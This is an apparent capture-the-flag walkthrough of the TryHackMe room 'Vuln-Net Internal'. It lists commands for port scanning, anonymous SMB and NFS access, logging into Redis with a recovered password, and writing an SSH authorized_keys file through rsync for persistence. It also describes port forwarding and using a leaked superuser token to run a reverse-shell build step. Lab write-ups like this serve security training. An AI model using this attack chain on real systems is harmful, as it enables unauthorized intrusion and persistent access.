Vuln-Net Internal TryHackMe
Hello friends, Today I want talk about how to solve this room on Tryhackme.
let’s get started
Enumeration
First I’ll use Masscan
it to scan the open ports on our target.
sudo masscan -p 1-65535 --interface tun0 --rate 1000 10.10.23.179
Okay, let’s use Nmap to scan these services.
sudo nmap -sV -sC -sS -p 2049,54515,445,139,111,42429,22,6379,33859,37729,873 -oA scan/result 10.10.23.179
SMB Service
We can log in as guest users in the Samba service let’s log in and see if we found anything.
smbclient -N -L //10.10.23.179
smbclient -N //10.10.23.179/shares
I’ll download files from these directories to see what is inside these files.
get name_file.txt # Download Files On VM Machine
I found the first flag let’s Deep Dig.
NFC Service
showmount -e $IP
let’s download this directory on the VM attacker.
mkdir mount
sudo mount -t nfs $IP:/opt/conf mount
After searching I found a configuration file for the Redis database, let’s see it.
cat redis.conf | grep -i "pass"
Great, I found the password let’s see what we can do with this password.
Redis
Now we have a password let’s log in to the Redis database to see what we can do.
redis-cli -h $IP -p 6379 -a "B65Hx562*****" # login with the password
keys * # Returns all key names
get "internal flag" # Retrun value
type name_keys # Returns the string representation of the type
lrange authlist 1 10000
Now we have something encoded let’s decode that.
echo "Value_encoded" | base64 -d
Okay, now we have these credentials let’s see what we can do.
Rsync service
Rsync is a Linux utility that can synchronize files and directories remotely or locally.
rsync -av --list-only rsync://10.10.52.162 # Listing a shared folder
rsync -av rsync://rsync-connect@10.10.52.162/files ./rsync # Copying files from a shared folder
Now we have a user flag, now we can upload authorized keys to connect via SSH.
ssh-kegen
rsync -ahv ./authorized_keys rsync://rsync-connect@10.10.52.162/files/sys-internal/.ssh/authorized_keys --inplace --no-o --no-g
Foothold
ssh -i id_ed25519 sys-internal@10.10.52.162
After some enumeration, I found this.
ss -ltnp
let’s forward traffic to our machine, After that, we can visit this website.
ssh -i id_ed25519 sys-internal@10.10.52.162 -L 631:127.0.0.1:631
After searching on this website I didn’t find anything interesting, After forwarding the traffic internal services to my machine I found this website.
ssh -i id_ed25519 sys-internal@10.10.52.162 -L 8111:127.0.0.1:8111
If you see the version you will find this website uses the old version let’s deep into our search.
I can access files on this website let’s search in files.
After reading this file I found a token superuser and I logged in with that token without a username, and then I could access the admin dashboard.
Now we have access as the superuser, and we need to create a new project > build configuration > build step and add a Python script for getting a reverse shell.
Now we are root.
Thanks for reading.